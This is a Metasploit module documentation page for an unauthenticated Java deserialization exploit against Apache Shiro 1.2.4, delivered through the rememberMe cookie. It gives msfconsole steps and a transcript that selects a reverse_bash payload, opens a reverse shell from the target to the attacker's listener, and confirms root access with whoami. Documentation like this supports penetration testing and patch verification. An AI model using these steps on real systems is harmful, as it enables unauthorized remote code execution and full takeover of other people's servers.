metasploit-gs/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

Description

Apache Shiro v1.2.4 is vulnerable to a Java deserialization vulnerability. An unauthenticated user can submit a YSoSerial payload to the Apache Shiro web server as the value to the rememberMe cookie. This will result in code execution in the context of the web server.

The YSoSerial CommonsCollections2 payload is known to work and is the one leveraged by this module.

Vulnerable Application

Shiro RememberMe 1.2.4

Verification Steps

1. ./msfconsole -q
2. use exploit/multi/http/shiro_rememberme_v124_deserialize
3. set rhosts <rhost>
4. run

Scenarios

Tested on GNU/Linux x86_64 using Shiro-1.2.4

msf5 > use exploit/multi/http/shiro_rememberme_v124_deserialize
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set rhosts 192.168.1.11
rhosts => 192.168.1.11
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Command shell session 2 opened (192.168.1.2:4444 -> 192.168.1.11:36206) at 2019-02-04 20:16:27 +0800

whoami
root
exit
[*] 192.168.1.11 - Command shell session 2 closed.